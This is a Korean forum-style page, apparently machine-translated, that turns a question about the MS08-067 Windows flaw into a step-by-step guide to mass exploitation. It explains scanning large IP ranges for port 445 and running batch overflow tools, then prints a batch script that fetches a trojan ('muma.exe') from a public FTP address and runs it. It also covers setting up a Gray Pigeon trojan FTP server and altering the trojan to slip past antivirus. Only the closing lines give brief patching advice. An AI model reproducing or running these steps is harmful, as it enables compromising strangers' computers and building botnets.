컴퓨터 지식 네트워크 - 컴퓨터 구성 - ms08-67, 이 패치를 이미 다운로드했는데 왜 계속 공격을 받고 있습니까?

ms08-67, 이 패치를 이미 다운로드했는데 왜 계속 공격을 받고 있습니까?

MS08-67 오버플로는 올해 발생한 가장 큰 취약점 중 하나라고 할 수 있습니다. 그 범위가 넓고, 사용자의 예방 인식이 낮으며, 침입이 상대적으로 단순하기 때문입니다. 많은 해커들이 선호하는 함정입니다! 일반 사용자의 경우 인터넷 육계를 빠르게 포획할 수 있는 몇 가지 간단한 일괄 처리 방법을 권장합니다.

1. MS08-67 오버플로는 완전 자동입니다.

CMD 명령 프롬프트 창을 이해하지 못하고 다양한 명령 작업에 익숙하지 않으면 작동하지 않습니다. CMD 명령 프롬프트 창 아래의 다양한 일괄 처리 명령은 때때로 다양하고 복잡한 수동 작업을 편리하게 완료하는 데 도움이 될 수 있습니다. "MS08-67 오버플로 자동"은 일괄 처리를 사용하여 취약한 호스트, 오버플로를 자동으로 검색하고 실행 중인 트로이 목마를 업로드하는 도구입니다. 수만 개의 IP 주소에서 오버플로 공격을 자동으로 검사할 수 있습니다!

1. IP 세그먼트 설정

"MS08-67 Overflow Automatic" 도구를 다운로드하고 압축을 풀고 "TXT" 및 "TXT2" 폴더를 열고 *** 거기에 "IP1.txt", "IP2.txt" 등의 이름을 가진 8개의 IP 파일이 있습니다. 메모장으로 파일을 연 후 스캔할 주소 세그먼트를 추가하기만 하면 됩니다. 각 파일에 IP 세그먼트를 넣으면 IP 주소 세그먼트의 범위가 너무 길어서는 안 됩니다. 그렇지 않으면 일반적으로 한 세그먼트에 50,000개의 IP 주소이면 충분합니다.

2. 업로드 서버 설정

"down2.txt" 파일을 메모장으로 열어보면 FTP 자동 업로드를 위한 일괄 명령 코드임을 알 수 있습니다. 우리가 해야 할 일은 FTP 서버 주소, 로그인 사용자 이름 및 비밀번호를 수정하고 수정된 파일을 저장하는 것뿐입니다.

많은 트로이 목마 제어 프로그램에는 FTP 서비스 기능이 있습니다. 예를 들어 Gray Pigeon Trojan에서는 FTP 서버 도구 창을 엽니다. FTP 서버의 홈 디렉터리를 로컬 호스트 하드 디스크의 임의의 경로로 설정하고 "서비스 포트"를 21로 설정한 다음 사용자 이름과 비밀번호를 설정합니다. 설정 후 '서비스 시작' 버튼을 클릭하세요. 자체 FTP 서버를 구축할 때는 공용 IP 주소가 있어야 합니다. 그렇지 않으면 인터넷에서 FTP 서버에 연결하여 트로이 목마를 다운로드하고 실행할 수 없습니다.

FTP 서비스를 켠 후, "down2.txt" 파일의 FTP 서버를 자신의 IP 주소로 변경하고, 방금 설정한 FTP 서버의 사용자 이름과 비밀번호를 입력하세요.

3. 서버 프로그램 설정

먼저 트로이목마에 대해 바이러스 백신 등 다양한 작업을 수행한 후 방금 설정한 트로이목마의 루트디렉토리 폴더 경로에 넣어둡니다. FTP 서버. 그런 다음 "down2.txt" 파일 중 "다운로드하려는 abc.exe 파일"을 트로이목마 파일명으로 변경하고, 나머지 "abc.exe"를 트로이목마 파일명으로 변경한 후 저장한다. 파일. 마지막으로 수정된 "down2.txt" 파일은 다음과 같습니다:

echoopen220.172.228.177>cc1.dat

echoxiaoyao>>cc1.dat

echoxiaoyao > >cc1.dat

echobinary>>cc1.dat

echogetmuma.exe>>cc1.dat

echobye>>cc1.dat

ftp-s:cc1.dat

muma.exe

delcc1.dat

muma.exe

종료

p >

오버플로 업로드 상태를 자동으로 종료하려면 마지막 "exit" 문자열 뒤에 캐리지 리턴을 추가해야 합니다.

4. 일괄 오버플로

이제 일괄 오버플로 공격을 시작할 수 있습니다. "MS08-67 Overflow Automatic" 도구 디렉터리에는 Windows 2000/2003 시스템과 Windows XP 시스템에서 각각 실행되는 두 개의 배치 파일 "win2k.BAT" 및 "xp.bat"가 있습니다. 사용 중인 시스템 유형에 따라 해당 배치 파일을 두 번 클릭하면 자동 오버플로가 시작됩니다.

오버플로 도구는 먼저 지정된 IP 주소 세그먼트에서 포트 445가 열려 있는 호스트를 검사하고 취약한 호스트의 IP 주소를 저장한 다음 오버플로 트로이 목마 공격을 자동으로 업로드합니다.

2. MS08067 일괄 오버플로

일괄 오버플로 도구에서 "445.exe" 도구를 실행하여 일괄 스캔을 수행합니다. 이 도구는 명령줄 아래의 일괄 처리 프로그램이기도 합니다. 먼저 시스템 유형을 선택하십시오. WindowsXP 호스트인 경우, Windows2000/2003 호스트인 경우 숫자 "1"을 누르십시오. 숫자 "2"를 누르고 SYN 스캐닝을 사용하십시오.

숫자키를 누르면 "IP.txt" 파일이 자동으로 열립니다. 이 파일은 스캔할 IP 주소 세그먼트를 설정하는 데 사용됩니다. 예를 들어 여기에서는 여러 줄 입력 스캔을 지원할 수 있는 "220.172.25.1-220.200.30.254" IP 주소 세그먼트를 스캔하도록 선택합니다. IP 주소 세그먼트를 설정한 후 파일을 저장하고 메모장 창을 닫습니다.

오버플로 창으로 돌아가서 아무 키나 누르면 취약한 호스트를 자동으로 검색하기 시작합니다. 프로그램은 S 스캐너를 호출하여 일괄 스캔을 수행합니다. 스캔 속도가 매우 빠르며 스캔 결과는 현재 디렉터리의 "Result.txt" 파일에 저장됩니다. 마지막으로 프로그램은 자동으로 스캔 결과를 구성하고 포트 445가 열려 있는 모든 호스트 IP 주소를 "host.txt"라는 별도의 파일로 저장합니다.

검사가 완료된 후 "yichu.exe"를 실행하면 일괄 오버플로가 자동으로 수행됩니다.

MS08067 오버플로 취약점의 경우 가장 좋은 방법은 패치를 설치하는 것이라고 저자는 포트 445를 차단하는 것도 동일한 효과를 가질 수 있지만 많은 응용 프로그램 환경에서는 여전히 문제가 된다고 생각합니다. 또한 필요한 경우 방화벽을 사용하여 해당 포트를 모니터링할 수도 있습니다.

上篇: PS2가 시작되지 않습니다. 도와주세요 下篇: ps4madmax 게임에서 중국어를 설정하는 방법
관련 내용